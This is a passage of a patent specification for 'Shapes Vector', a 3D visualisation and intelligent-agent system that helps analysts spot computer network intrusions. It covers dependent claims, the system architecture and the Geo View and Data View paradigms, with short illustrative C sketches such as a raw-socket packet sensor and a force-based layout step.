47. A system according to claim 46 wherein a human determines when the representation is temporarily not human observable.
48. A system according to claim 47 wherein a human can control the state of the representation by manipulation of a control device.
49. A system according to claim 48 wherein said control device is physically manipulated.
50. A system according to claim 48 wherein said control device is aurally manipulated.
51. A system according to claim 1 wherein a human determines a subset of virtual objects and also determines a radius of influence for each virtual object in said subset such that according to the force related properties of said virtual objects there is interaction with other virtual objects within the said radius of influence within the same universe.
52. A system according to claim 51 wherein a human determines the subset of virtual objects for which a radius of influence is represented.
53. A system according to claim 52 wherein the representation of a predetermined style, size and colour.
54. A system according to claim 51 wherein a human determines when the representation is temporarily not human observable.
55. A system according to claim 51 wherein a human can control the state of the representation by manipulation of a control device.
56. A system according to claim 55 wherein said control device is physically manipulated.
57. A system according to claim 55 wherein said control device is aurally manipulated.
58. A system according to claim 1 wherein a human determined perturbation function is applied to all virtual objects in a universe.
59. A system according to claim 58 wherein a human determines a set of zero or more virtual objects that are to be fixed in position before a perturbation such that the position of those virtual objects remains unchanged as a result of said perturbation.
60. A system according to claim 58 wherein a human determines a set of zero or more virtual objects that are to be fixed in position after a perturbation.
61. A system according to claim 58 wherein said perturbation function is a random positioning of said virtual objects.
62. A system according to claim 58 wherein said perturbation function is a movement in a random direction of virtual objects from their current position by a constrained random distance.
63. A system according to claim 58 wherein said perturbation function is a positioning of said virtual objects to a common position.
64. A system according to claim 58 wherein said perturbation function is a positioning of said virtual objects so as to be evenly distributed about the edge of said universe.
65. A system according to claim 1 wherein a human determines the position of one or more virtual objects.
66. A system according to claim 1 wherein a human determines the position of a subset of virtual objects that maintain their position within the universe.
67. A system according to claim 1 wherein a human determines the position and period of existence of a force related property within a universe.
68. A system according to claim 1 wherein said mapping determines an attribute value according to the first attribute, condition pair of an ordered list of pairs where the condition is satisfied by the representation of the real or virtual object.
Description
PART 1 SHAPES VECTOR
1 Shapes Vector Introduction
Shapes Vector is the name given by the inventors to a particular collection of highly versatile but independent systems that can be used to make real world systems observable by a human operator. By providing an observation system the human may be able to detect using one or more of their senses anomalies and the like in the real world system. More particularly, the invention/s disclosed herein are in the field of information observation and management.
To assist the reader, a particular combination of these elements is described in an example. The example is in the field of computer network intrusion detection, network security management and event surveillance in computer networks. It will however be apparent to those skilled in the art that the elements herein described can exist and operate separately and in different fields and combinations to that used in the example.
The different system elements developed by the inventors are the result of the use of several unusual paradigms that while separately make a their contribution also act synergistically to enhance the overall performance and utility of the arrangement they form part of.
An embodiment in the computer network field is used to illustrate an observation paradigm that works with a collection of elements, to provide a near real-time way for observing information infrastructures and data movement. The user (human observer) is provided sophisticated controls and interaction mechanisms that will make it easier for them to detect computer network intrusion and critical security management events in real time as well as allow them to better analyse past events. The user may be computer assisted as will be noted where appropriate.
However, as stated previously each of the elements of the system disclosed herein are also capable of being used independently of the other. It is possible for each of them to be used in different combinations, alone or in conjunction with other elements as well as being the precursor for elements not yet created to suit a particular environment or application.
Whilst the Shapes Vector embodiment provided is primarily meant to aid computer intrusion detection, the system, and/or components of it, can be arranged to suit a variety of other applications, e.g. data and knowledge mining, command and control, and macro logistics.
Shapes Vector is a development in which a number of key technologies have been created that include:
• a high-performance multi-layer observation facility presenting the user with a semantically dense depiction of the network under consideration. To cater to the individual observational capacities and preferences of user analysts, the specifics of the depiction are highly user-customable and allow use of more than just the user's visual and mental skills;
• a framework for “intelligent agents”; artificial intelligent software entities which are tasked with co-operatively processing voluminous raw factual observations. The agents can generate a semantically higher-level picture of the network, which incorporates security relevant knowledge explicitly or implicitly contained within the raw input (however, such agents can be used to process other types of knowledge);
• special user interface hardware designed especially to support Defensive Information Operations in which several user analysts operate in real-time collaboration (Team-Based Defensive Information Operations).
• an inferencing strategy which can coexist with traditional deductive mechanisms. This inferencing strategy can introduce certainty measures for related concepts.
The subject matter of this disclosure is complicated and it is both a hindrance and a necessity to present particular elements of the Shapes Vector system in the same document.
However, it will be apparent to those skilled in the art that each element that makes up the Shapes Vector system is capable of independent existence and operation in different environments.
To reflect to some degree the independence of the elements disclosed, this specification is comprised of different parts that each have their own paragraph numbering but page numbering is consistent with their being included in a single document.
• Part 1
• Shapes Vector Introduction
• Part 2
• Shapes Vector Master Architecture and Intelligent Agent Architecture
• Part 3
• Data View Specification
• Part 4
• Geo View Specification
• Part 5
• Tardis (Event Handler) Specification
A detailed index of the various parts and sections is provided on the last pages of the specification to assist random access to the information provided herein or to make cross-referencing simpler.
Part 1 is an overview of the Shapes Vector embodiment that describes a particular environment and discloses in a general way some of the elements that make up the total system. Parts 2, 3, 4 and 5 disclose fundamental aspects of the Intelligent Agent Architecture, Data View, Geo View and the Tardis (Event Handler) specification respectively, terms that will be more familiar once the specification is read and understood.
This patent specification introduces the Shapes Vector system by firstly describing in Sections 1 and 2 of Part 1, the details of its top-level architecture. Included are details of the hardware and software components present in a system presently under construction. Section 3 of Part 1, gives an overview of the first set of observation (some times referred to as visualisation) paradigms, which have been incorporated into the system. Two different views of computer/telecommunications networks are described in this section, both presenting a three-dimensional “cyberspace” but with vastly different approaches to the types of entities modelled in the space and how they are positioned (and dynamically repositioned). Some preliminary comments are offered as to the effectiveness of one of these views, “Geo View”, for network defence. “Geo View” is another of those terms that will be better understood after a reading of the document.
A description of the intelligent agent architecture follows in Section 4 of Part 1, including an overview of the multi-layered Shapes Vector Knowledge Architecture (SVKA) plus details of the inferencing strategies. The knowledge processing approach is very general, and is applicable to a wide variety of problems. Sections 5 and 6 of Part 1 describe special techniques employed within the Tardis (Event Handling) system to assist a user analyst to observe the time-varying behaviour of a network. Two principal mechanisms are detailed, Synthetic Strobes and Selective Zoom, along with some hypotheses as to how such mechanisms might be extended to offer even greater flexibility. Section 7 of Part 1 of the patent specification details a comparative analysis of related research and a set of conclusions summarising the broad thrusts of the Shapes Vector system.
More detailed disclosures of these elements of the invention are provided in Parts 2, 3, 4 and 5.
In reading this specification, it should be noted that while some issues are dealt with in detail, the specification is also used to disclose as many of the paradigms and strategies employed as possible, rather than discussing any one paradigm in depth. In an attempt to provide an example of how these paradigms and strategies are used, several new mechanisms for dealing with information in a real-time environment are described in the context of the information security field but in no way are the examples meant to limit the application of the mechanisms revealed.
Observation is a term used in this specification to embody the ability of a human to observe by experience through a variety of their senses. The senses most used by a human user include sight, hearing and touch. In the embodiment and system developed thus far all of those senses have been catered for. However, the term observe is not used in any limiting way. It may become possible for a human's other senses to be used to advantage not only in the scenario of computer system security but others within the realm of the imagination of the designer using the principles and ideas disclosed herein. A human could possibly usefully use their other senses of smell, taste and balance in particular future applications.
In this specification the term clients is used to refer to a source of events based on real and virtual objects operating in the real world and the term monitors is used to refer to one or more recipient systems that make the events observable to a human user.
The following discussion will provide background information relating to the described embodiment of the invention or existing paradigms and strategies and when it does so it is intended purely to facilitate a better understanding of the invention/s disclosed herein. However, it should be appreciated that any discussion of background information is not an acknowledgment or admission that any of that material was published, known or part of the common general knowledge as at the filing date of the application.
BRIEF DESCRIPTION OF THE FIGURES
FIG. 1 illustrates a Shapes Vector Functional Architecture.
FIG. 2 illustrates a Hardware Component Architecture.
FIG. 3 illustrates a Distribution of Software Modules.
FIG. 4 illustrates a Geo Network View.
FIG. 5 illustrates a Geo View inside a Machine.
FIG. 6 illustrates a Data View.
FIG. 7 illustrates a Shapes Vector Knowledge Architecture.
FIG. 8 illustrates a Vector Spaces for Agents Inference.
FIG. 9 illustrates Selective Zoom with staircasing.
FIG. 10 illustrates IA Time Apertures along a Data Stream.
FIG. 11 illustrates Shapes Vector Tactical Control.
FIG. 12 illustrates agent assertion router concepts for a single Locale Gestalt of 4 Levels.
FIG. 13 shows a more comprehensive example of the FIG. 12 example.
FIG. 14 illustrates BASS Configuration.
FIG. 15 shows an overview diagram for GeoView.
FIG. 16 shows the processing within the CCI thread as part of the GeoView thread diagram.
FIG. 17 shows a class relationship diagram for a Layout Class Hierarchy.
FIG. 18 shows a Logical Object View of the types of parent-child relationships allowable in the data structure and how these classes work together to form the logical object view of the GeoView visual system.
FIG. 19 shows the Object Layout Structure.
FIG. 20 shows what the DIRECTION and ORIGIN line will look like with various GenericLine combinations.
FIG. 21 shows a five-object ring with CLOCKWISE direction.
FIG. 22 illustrates the process interactions between the View Applications (GeoView/DataView) the Registry, and the Tardis.
FIG. 23 illustrates Event Formats.
FIG. 24 illustrates Shared Memory Use.
FIG. 25 illustrates Synthetic Time.
FIG. 26 illustrates Tardis Components.
FIG. 27 illustrates a Process and Thread Activity Graph.
FIG. 28 illustrates a Tardis Store.
FIG. 29 illustrates a Tardis Clock.
2 ARCHITECTURAL COMPONENTS
2.1 Primary Functional Architecture
At the coarsest level, the Shapes Vector system can be considered to be composed of a series of “macro-objects,” shown in FIG. 1. These modules interact with one another in various ways: the lines in the figure indicate which objects interact with others. The functions performed by each of these macro-objects and the purpose and meaning of the various inter-object interactions are described in the parts and sections that follow.
2.1.1 Configuration Interface and I/O Sub-system
The Configuration Interface and I/O macro-objects collectively encapsulate all functionality, involving interaction with the user of the Shapes Vector system. They in turn interact with the Display, Tardis (Event Management) and Intelligent Agent macro-objects to carry out the user's request. In addition to being the point of user interaction with the system, this user-interface macro-object also provides the ability to customise this interaction. Refer to FIG. 1, which displays the Functional Architecture of Shapes Vector. A user can interactively specify key parameters, which govern the visual and other environments generated by Shapes Vector and the modes of interaction with those environments. Such configurations can be stored and retrieved across sessions allowing for personal customisation.
Individual users can set up multiple configurations for different roles for which they might wish to use the system. Extensive undo/redo capabilities are provided in order to assist with the investigation of desired configurations.
The observation of the Shapes Vector world is user-customable by direct interaction with a structure called the “Master Table” (see Section 3). In this table the user can in one example, associate visual attributes, such as shape, colour and texture, with classes of objects and their security-relevant attributes.
A user interacts with the Shapes Vector system via any number of input and output devices, which may be configured according to each individual user's preferences. The input devices may be configured at a device-specific level, for example by setting the acceleration of a trackball, and at a functional level, by way of further example, by assigning a trackball to steer a visual navigation through a 3-dimensional virtual world representative of a computer network. The Appendix to Part 1 describes the typical user interface hardware presented to a Shapes Vector user.
2.1.2 Sensors
Sensors can take many forms. They can be logical or physical. A typical example would be an Ethernet packet sniffer set to tap raw packets on a network. In another example, the sensor can be the output of a PC located at a remote part of a network, which undertakes pre-processing before sending its readings of itself or the network back to the main Shapes Vector system components. Other examples are software or hardware to capture packets in a digital communication network, to examine the internal or operating state of a computer, or to analyse audit records created by a computer or network device. Sensors transmit their data into the level one portion of the Intelligent Agent Gestalt (this term will also have more meaning after further reading of the specification) for further processing. Some of the processing involved could entail massaging of data for Knowledge Base storage, or perhaps simple logical deductions (first order logic facts).
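By way of illustration only (this sketch is not part of the Shapes Vector system), a minimal Linux raw-socket tap of the kind such a sensor might be built on looks like the following; a real sensor would parse the captured frames and forward observations to the level-one agents rather than print them:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_ether.h>   /* ETH_P_ALL */
#include <arpa/inet.h>        /* htons */
#include <unistd.h>

/* Minimal Ethernet tap: capture raw frames and report their length.
 * Requires root (or CAP_NET_RAW) on Linux. */
int main(void)
{
	int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if (fd < 0) {
		perror("socket");
		return 1;
	}

	unsigned char frame[2048];
	for (int i = 0; i < 10; i++) {          /* capture a few frames */
		ssize_t n = recv(fd, frame, sizeof(frame), 0);
		if (n < 0) {
			perror("recv");
			break;
		}
		printf("captured frame of %zd bytes\n", n);
	}
	close(fd);
	return 0;
}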
2.1.3 Intelligent Agent Architecture
2.1.3.1 Knowledge Base
The Knowledge object is essentially a knowledge base containing facts about the overall domain of discourse relevant to Shapes Vector. The knowledge is represented in terms of context-free Entities and Relationships, allowing for its efficient storage in a relational database. Entities constitute not only physical devices such as computers and printers, but also logical objects such as files and directories. Each entity possesses a set of security-relevant attributes, which are stored within the knowledge base. For each stored observation of an entity attribute, there is accompanying meta-data that includes the time of discovery, which agent or sensor discovered it and an expiry time for the data. The current knowledge base models several types of inter-entity relationships, including physical connectivity, physical or logical containment, bindings between processors and processes, roles of processes in client-server communications, origin and destination of packet entities, and so on.
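A minimal sketch of the kind of record such a knowledge base might hold for each attribute observation is shown below; the field names are illustrative assumptions rather than the patent's schema:

#include <time.h>

/* One stored observation of an entity attribute, carrying the meta-data
 * the text describes: who discovered it, when, and when it expires. */
struct kb_observation {
	long        entity_id;      /* the entity the fact is about        */
	const char *attribute;      /* e.g. "read_enable"                  */
	const char *value;          /* observed value, stored as text      */
	const char *discovered_by;  /* agent or sensor that asserted it    */
	time_t      discovered_at;  /* time of discovery                   */
	time_t      expires_at;     /* after this, the fact is stale       */
};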
2.1.3.2 Intelligent Agents and Ontologies
The Intelligent Agent macro-object encapsulates the artificial intelligence aspects of the Shapes Vector system. It specifically incorporates a (potentially very large) family of intelligent agents: software entities imbued with expert knowledge in some particular domain of discourse over which they may make deductions. Agents within the Shapes Vector system are arranged into a series of "abstraction layers" or "logical levels" with each agent existing at only one such layer. Agents operate by accepting knowledge of a particular abstraction, possibly from several sources in lower layers, and generating new knowledge of a higher level of abstraction through a deductive process. An agent that resides at layer n of the Shapes Vector Knowledge Architecture must receive its input knowledge in the form of assertions in a knowledge representation known as the "Level n Shapes Vector ontology". Any deductive product from such an agent is expressed in terms of the (more abstract) "Level n+1 Shapes Vector ontology".
Entities in the Intelligent Agent macro-object can be broken into categories: data-driven entities and goal-driven entities. The former group is characterised by a processing model wherein all possible combinations of input facts are considered with an eye towards generating the maximum set of outputs; a common method employed is forward chaining. Goal-driven entities adhere to a different execution model: given a desirable output, combinations of inputs are considered until that output is indicated, or all combinations are exhausted.
Intelligent Agents and the goals and functionality of the Shapes Vector Knowledge Architecture are covered in more depth in Section 4 of this part of the specification and in Part 2 of the specification.
2.1.4 The Tardis
The Tardis is a real-time event management system. Its task is to schedule and translate the semantic deductions from Intelligent Agents and sensors into events capable of being visualised by the display module or sub-system. The Tardis also encapsulates the Shapes Vector system's notion of time. In fact, the operator can shift the system along the temporal axis (up to the present) in order to replay events, or undertake analyses as a result of speeded-up or slowed-down notions of system time.
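The scheduling idea can be illustrated with a toy sketch (this is not the Tardis implementation): events carry a timestamp, sit in a time-ordered store, and are dispatched to the display as an adjustable synthetic clock sweeps past them, which is what allows replay and speeded-up or slowed-down time:

#include <stdio.h>

/* Toy event scheduler: events are dispatched once the synthetic clock,
 * which can be swept faster or slower than real time or restarted from
 * the past, reaches their timestamp. */
struct sv_event {
	double when;        /* synthetic timestamp of the event        */
	const char *what;   /* description handed to the display layer */
};

static void replay(const struct sv_event *ev, int n,
                   double start, double end, double tick)
{
	/* 'tick' is the synthetic time advanced per step; a larger tick
	 * replays the same window faster, a smaller one slower. */
	for (double t = start; t <= end; t += tick)
		for (int i = 0; i < n; i++)
			if (ev[i].when > t - tick && ev[i].when <= t)
				printf("t=%.1f dispatch: %s\n", t, ev[i].what);
}

int main(void)
{
	const struct sv_event ev[] = {
		{ 1.0, "login observed" },
		{ 2.5, "file read" },
		{ 4.0, "new connection" },
	};
	replay(ev, 3, 0.0, 5.0, 0.5);   /* replay a 5-unit window */
	return 0;
}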
2.1.5 Monitor
Monitor preferably renders three-dimensional (3D) views of objects and their interactions in real-time. As can be seen, there are a number of basic views defined all of which can be navigated. Each different view is based on a fundamental visualisation paradigm. For example, Geo View is based on location of virtual objects within a space-time definition, whereas Data View's location of virtual objects within its space is based on the data interaction.
Several reusable modules make up the composition of each view. These include elements such as data structures identifying the shapes, textures, and visual relationships permitted for each class of object, as well as common rendering methods for representing the view's Universe.
The paradigms for some of the views are discussed in more detail in later sections. It will be appreciated that the visualisation paradigms are in fact specific embodiments of the observational requirement of the system, wherein a human user can use one or more of their senses to receive information, that could include aural and haptic interaction.
2.2 The Hardware
In a preferred embodiment of this invention, the hardware architecture of the Shapes Vector system consists of a primary server equipped with a powerful computational engine and high-performance 3D graphics capabilities, a database server, a dedicated 100BaseT Ethernet network, one PC with specialised 3D audio hardware, and one PC with user input devices attached. A preferred configuration is shown schematically in FIG. 2.
The preferred observational environment of the Shapes Vector world can be rendered in 3D stereo to provide aural information and preferably viewed using Crystal Eyes™ shutter glasses synchronised to the display to provide purely visual information. Crystal Eyes™ was chosen for visualisation, as this product allows the user to be immersed in a 3D world on a large screen while still permitting real world interaction with fellow team-members and the undertaking of associated tasks, e.g. writing with a pencil and pad, that are features not available with head-mounted displays.
In addition to 3D graphics capabilities, there is a sound rendering board, which is used to generate multi-channel real-time 3D audio. Both the 3D graphics and sound rendering board make use of head tracking information in producing their output. The graphics renderer makes use of tracking information to alter the perspective of the displayed world so that the user experiences the effect of moving around a fixed virtual world. The sound renderer makes use of head movement tracking information to alter the sound-scape so that the user also experiences the effect of moving around in a fixed world with relevant sounds. That is, where a particular sound source will be perceived to be coming from the same fixed place irrespective of the users head movement. The perception of direction in 3D sound is enhanced by the ability to turn one's head and listen. For instance, it is often difficult to determine whether a sound is coming from in front or behind without twisting one's head slightly and listening to determine in which ear a sound is received first or loudest. These perceptive abilities are second nature to humans and utilisation of them is a useful enhancement of the information presentation capabilities of Shapes Vector.
A joystick and rudder pedals preferably provide the primary means of navigation in the 3D world. User input to the system is to be provided primarily through the touch screen and via voice recognition software running on a PC. Haptic actuators are realisable using audio components to provide a feeling of say roughness as the user navigates over a portion of the virtual world. Many other actuators are possible depending on the degree of feedback and altering required by the user.
The initial prototype of Shapes Vector had the user input/output devices connected to a workstation or PC with software connecting the remote peripherals with the User Interface proper. The layout of the Shapes Vector workstation (ie, the physical arrangement of the user interface hardware) will vary depending upon the operational role and the requirements of individual users, as described in the Appendix to Part 1 of the specification.
2.3 System Software
In the embodiment described herein Shapes Vector is implemented as a distributed system with individual software components that communicate between each other via TCP/IP sockets. A simple custom protocol exists for encoding inter-process communication. To limit performance degradation due to complex operating system interaction, the system processes are used only for relatively long-lived elements of control (e.g. the knowledge base server, or an intelligent agent). Shorter-lived control is implemented through threads.
FIG. 3 indicates where the primary software modules will be running in the initial system as well as a schematic of the hardware modules they are associated with. While most of the implementation of the Shapes Vector system has been custom-coded, the system does make use of a number of different software technologies to supply service functionality. Intelligent Agents make extensive use of NASA's CLIPS system as a forward chaining engine, and also use Quintus Prolog TM to implement backward chaining elements. Additionally, the knowledge base and its associated servers are preferably implemented using the Oracle TM relational database management system.
The graphics engine of the Display macro-object is preferably built upon an in-house C++ implementation of the Java 3D API and utilises OpenGL™ for the low-level rendering. The User Interface elements are built using Sun Visual Workshop™ to produce X Windows Motif™ GUI elements.
3 The “Classical” Visualisation Paradigm
The classical visualisation paradigm refers to methods that are derived from mechanisms such as geographic layout, and relatively static rules for objects. While some may not regard what is described here as entirely “classical”, it serves to distinguish some of the visualisation methods from the relatively more “bizarre” and therefore potentially more interesting visualisation paradigms described in this specification.
Using by way of example information security as the environment to be modelled and observed the fundamental basis of the classical visualisation paradigm is to associate a security-relevant attribute with a visual entity or a visual property of an entity, eg. shape, colour, or texture.
A Shapes Vector hypothesis is that any visualisation paradigm is not only “sensitive” to its application, ie. some paradigms are better suited to specific classes of application, but that the implementation of the paradigm is sensitive to the specific user. It is thus claimed that not only should a visualisation system be customable to take into account the type of application, but also it must have highly customable features to take into account individual requirements and idiosyncrasies of the observer. That is, the customisability of the system is very fine-grained.
In fine grained customable systems, it is important that journal records and roll-back facilities are available in the certain knowledge that users will make so many changes that they will “lose” their way and not be sure how to return to a visual setting they find more optimal than the one they are currently employing.
In an embodiment, users can associate attributes to shapes, colour, texture, etc. via manipulation of a master table, which describes all visual entities (with security-relevant attributes) the system is able to monitor. This table contains user-customable definitions for shapes, colours, and textures employed in the visualisation of the entity. For example, the security attribute “read enable” can be associated with different colours, transparencies or textures. Part of the essence of Shapes Vector involves utilising the visualisation process as a method for users to divine (via inductive inference) patterns in the “security cyberspace”. These patterns have an attached semantic. Typically, we expect users to note anomalies from the myriad system activities that represent authorised use of the system. Given these anomalies, the user will be able to examine them more closely via visualisation, or bring into play a set of Intelligent Agents to aid an in depth analysis by undertaking deductive inference.
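As an illustration of the kind of mapping such a master table expresses (the structure and values below are assumptions made for the sketch, not the patent's format):

/* One user-customable mapping rule: if an object of the given class has
 * an attribute satisfying the condition, render it with the given
 * visual (and optionally audio) style. */
struct master_table_row {
	const char *object_class;   /* e.g. "file", "process"      */
	const char *attribute;      /* e.g. "read_enable"          */
	const char *condition;      /* e.g. "== true"              */
	const char *shape;          /* e.g. "cube"                 */
	const char *colour;         /* e.g. "white"                */
	const char *texture;        /* e.g. "transparent"          */
	const char *sound;          /* optional audio cue, or NULL */
};

static const struct master_table_row example_rows[] = {
	{ "directory", "readable",   "== true", "cube",    "white", "transparent", NULL },
	{ "process",   "code_space", "changed", "pyramid", "red",   "rough",       "alert" },
};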
Notwithstanding the above, there is also a semantic gap between what an Intelligent Agent can deduce and what a user can discern using their senses. The approach in this embodiment is based on the hypothesis that in most cases the observational interface element will be employed for highlighting macro matters, while the agents will focus on micro matters. These micro deductions can be fed to the visualisation engine so that a user can observe potential overall state changes in a system, thereby permitting a user to oversee and correlate events in very large networks.
3.1 Geo View
Geo View is perhaps the most classical of the visualisation paradigms. Its basis is a two-dimensional plane located in three-dimensional space. The plane represents the traditional geographic plane: location in the virtual plane represents the physical location of objects. FIG. 4 is a depiction of a small network where the primary points of interest involve a set of computers and the data that is flowing between them. The sizes, shape, and texture of objects all carry an associated semantic. The double pyramid shapes with a third pyramid embedded at the top are representative of computers with network interfaces. Also quite visible is the packet flow between the computers in the star network. Although not explained here, to the trained eye the start of a telnet session, some web traffic, as well as X Windows elements are also represented.
The Shapes Vector system permits a user to select classes of objects and render them above the plane. In fact it is possible to render different classes of objects at different levels above or below the geographic base plane. This rendering tactic allows a user to focus on objects of interest without losing them in the context of the overall system. This “selective zoom” facility is described further in Section 5.2 of this part.
FIG. 5 depicts a scene inside a machine object. In this view, two processors each with several processes are depicted. In an animated view of this scene the amount of processing power each of the processes is consuming is represented by their rate of rotation. Again, the size, texture, and specific aspects of their shape can be and are used to depict various semantics.
The transparent cube depicts a readable directory in which is contained a number of files of various types.
In addition to the visualisation of various objects, the human observer can attach sounds and possibly haptic characteristics to objects. In particular, the system is capable of compiling a “sound signature” for an object (e.g. a process) and plays the resulting sound through speakers or headphones. This facility is quite powerful when detecting event changes that may have security significance. Indeed, in a concept demonstrator, a change in the code space of a process causes a distinct change in its sound. This alerts the user when listening to a process (e.g. printer daemon) with a well-known characteristic sound that something is not quite right. By inspecting the process visually, further confirmation can be forthcoming by noting that its characteristic appearance, e.g. colour, has changed. The use of haptic attributes can also be advantageous in certain circumstances.
One of the major issues that arises out of Geo View, other than the basic geographic location of nodes, is the structural relationship of objects contained in a node. For example, how does one depict the structural relationship of files? FIG. 5 gives some indication of a preferred view, in which a directory containing files and possibly further directories is rendered in a particular way. In a system such as UNIX, there is a well-understood tree structure inherent in its file system. In other operating systems, the structure is not so precise. In the description so far, Geo View still lacks a level of structural integrity, but it must be realised that any further structure which is imposed may invalidate the use of the view for various applications or specific user requirements.
Shapes Vector avoids some of the problems posed above by providing a further level of customisation by permitting a user to specify the structural relationship between classes of objects from a predetermined list (e.g. tree, ring). A run-time parser has been constructed to ensure that any structural specification must satisfy certain constraints, which guarantee that “nonsensical”, or circular relationships, which are impossible to display, are not introduced.
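The constraint check described above amounts to rejecting cycles in the declared structural relationships between object classes; a generic sketch of such a check (not the patent's parser) using depth-first search is shown below:

#include <stdbool.h>
#include <stdio.h>

#define MAX_CLASSES 16

/* adj[a][b] means "objects of class a are laid out inside/relative to
 * class b". A cycle in this relation would be impossible to display. */
static bool has_cycle_from(int node, int n, bool adj[][MAX_CLASSES], int state[])
{
	state[node] = 1;                       /* 1 = on the current DFS path */
	for (int next = 0; next < n; next++) {
		if (!adj[node][next])
			continue;
		if (state[next] == 1)
			return true;               /* back edge: circular layout  */
		if (state[next] == 0 && has_cycle_from(next, n, adj, state))
			return true;
	}
	state[node] = 2;                       /* 2 = fully explored          */
	return false;
}

static bool layout_spec_is_valid(int n, bool adj[][MAX_CLASSES])
{
	int state[MAX_CLASSES] = { 0 };
	for (int i = 0; i < n; i++)
		if (state[i] == 0 && has_cycle_from(i, n, adj, state))
			return false;
	return true;
}

int main(void)
{
	bool adj[MAX_CLASSES][MAX_CLASSES] = { { false } };
	adj[0][1] = true;                      /* file inside directory       */
	adj[1][2] = true;                      /* directory inside filesystem */
	adj[2][0] = true;                      /* nonsensical: a cycle        */
	printf("specification valid: %s\n",
	       layout_spec_is_valid(3, adj) ? "yes" : "no");
	return 0;
}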
• 1. Geo View is a three-dimensional virtual universe in which a real-world or virtual object may be represented by one or more virtual objects whose visual attributes are derived from attributes of the real-world object via a flexible user-specifiable mapping (called herein a "Master Table"). The placement of virtual objects, typically having a shape, within the universe is governed by the absolute or relative geographical location of the real-world object, and also by a flexible set of user-specified layout rules. Layout rules permit the specification of a structured layout for groups of shapes whose real-world objects and virtual objects have some commonality. The list of structures includes, but is not limited to, linear, grid, star, ring and graph.
• 2. Changes to the visual attributes of shapes (e.g., size or height above a plane) may be made dynamically by a user (human observer). Such changes may be applied to all shapes in the universe or to those which match user-specified criteria. This facility is termed herein “Selective Zoom”.
• 3. The user may configure Audio cues (sounds and/or voices) to denote the attributes of represented objects (through a Master-Table configuration), or to denote the occurrence of a real-world event. Such cues may be associated with a point in three-dimensional space (i.e., positional sound), or they may be ambient.
• 4. The representation of real-world objects with rapidly time-changing attributes may be simplified by the use of Synthetic Strobes, flexible user-specified filters which shift changes in the visual attributes of a shape from one time-domain to another. Synthetic Strobes may be applied across the entire universe or selectively according to a flexible user-specification. Such strobes may also be used to shift slow changes in the attributes of a shape into a faster domain (e.g., so that a human may perceive patterns in very slowly altering real-world objects).
• 5. A user may select shapes within a Geo View universe (either interactively or by a flexible user-specified condition) and choose to have the corresponding set of shapes in another view (e.g., a Data View or a different Geo View) highlighted in a visual manner. The specification of the condition defining correspondence of shapes between universes may be made in a flexible user-defined fashion.
A user may also specify structural arrangements to be used by Geo View in its layout functions. For example, “located-in”, “in-between”, and “attached-to” are some of the operators available. These allow a flexible layout of shapes and objects preserving user required properties without requiring specific coordinates being supplied for all objects.
3.2 Data View
A problem with Geo View is that important events can be missed if heavily interacting objects or important events are geographically dispersed and not sufficiently noticeable. In Section 5 of this part, we discuss mechanisms that can be utilised to avoid this problem in some circumstances. However, in this section we describe a preferred view that is also intended to address parts of this problem. Parts 3 and 4 of the specification provide a more detailed account of this approach. Geo View has its roots in depicting actions and events that have physical devices and their location as an overriding theme. Of course logical entities are shown, but again they have a geographic theme. Data View, as its name suggests, is intended to provide a view where the basic paradigm is simply one of data driven events (eg. byte transfer) rather than geographic location. Heavily interacting objects, eg. producers and consumers of data, can be depicted as being located "close together". Unlike Geo View, where the location of an object tends to be relatively static during its lifetime (copying of files is simply a special case of bringing a new object into existence), interaction and data transfer between objects in Data View may be more dynamic. Thus, the location of objects is expected to be more dynamic. Therefore, rules are preferred so as to define the layout of objects not only from the perspective of whether interaction occurred, but also the amount of interaction, and the rate of interaction.
It is intended in a preferred embodiment to utilise Newtonian celestial mechanics, modelling interaction between objects as forces, as the fundamental rules for the Data View layout.
Each object has a mass that is based on its "size" (size is user defined, eg. the size of a file or code in a process). User defined interaction between objects causes the equivalent of an electric charge to build. This charge is attractive, whereas "gravity" resulting from mass is repulsive. The build-up of charge tends to negate the force of gravity thereby causing objects to move closer together until some form of equilibrium is reached. Of course we need to adjust the basic Coulomb and Newton's laws in order for the forces to balance appropriately. To do so, we are led to set axiomatically several calibration points. That is, we must decide axiomatically some equilibrium points; e.g. two objects of identical mass are in equilibrium X units apart with Y bytes per second flowing between them. Without these calibration points, the distance and motion of the objects may not provide optimal viewing. Further to this requirement, it can be inferred that the force formulae must be open to tinkering on a per user basis in order to permit each user to highlight specific interactions based on higher semantics related to the user's security mission. A further rule, which is preferred in this embodiment, is the rate of "decay" of charge on an object. Otherwise, interacting objects will simply move closer and closer together over time. This may be appropriate for some types of visual depiction for a user, but not for others. For example, retained charge is useful for a user to examine accumulative interaction over a time slice, but charge decay is a useful rule when examining interaction rates over a given time period.
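A minimal numeric sketch of this layout rule follows; the formulae and constants are illustrative choices, since (as noted above) the exact force laws and calibration points are left user-tunable. Attraction grows with accumulated interaction "charge", repulsion with object "mass", charge decays over time, and objects drift with a velocity proportional to the net force:

#include <stdio.h>
#include <math.h>

/* Toy two-dimensional Data View layout step. Constants are arbitrary
 * calibration points, as the text notes they must be chosen per user. */
struct node {
	double x, y;      /* position in the universe               */
	double mass;      /* derived from the object's "size"       */
	double charge;    /* accumulated interaction with the peer  */
};

static void step(struct node *a, struct node *b, double dt)
{
	const double k_attract = 1.0;   /* charge-based attraction */
	const double k_repel   = 50.0;  /* mass-based repulsion    */
	const double decay     = 0.1;   /* charge decay rate       */

	double dx = b->x - a->x, dy = b->y - a->y;
	double dist = sqrt(dx * dx + dy * dy) + 1e-6;

	/* Different distance exponents are used so an equilibrium separation
	 * exists - the "adjustment" to Coulomb/Newton the text mentions.
	 * Positive f pulls the pair together. */
	double f = k_attract * a->charge * b->charge / dist
	         - k_repel   * a->mass   * b->mass   / (dist * dist);

	/* velocity is proportional to the net force (no acceleration term) */
	double vx = f * dx / dist, vy = f * dy / dist;
	a->x += vx * dt;  a->y += vy * dt;
	b->x -= vx * dt;  b->y -= vy * dt;

	/* charge decays so the view reflects recent, not historical, traffic */
	a->charge *= 1.0 - decay * dt;
	b->charge *= 1.0 - decay * dt;
}

int main(void)
{
	struct node a = { 0.0, 0.0, 1.0, 5.0 };
	struct node b = { 10.0, 0.0, 1.0, 5.0 };

	for (int i = 0; i < 20; i++)
		step(&a, &b, 0.1);
	printf("separation after 20 steps: %.2f\n", b.x - a.x);
	return 0;
}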
The interaction mechanism described herein serves to indicate the basis for interaction between objects and their location in space to provide visual depiction of objects and their clusters for examination by a user in order to arrive at inductive hypotheses.
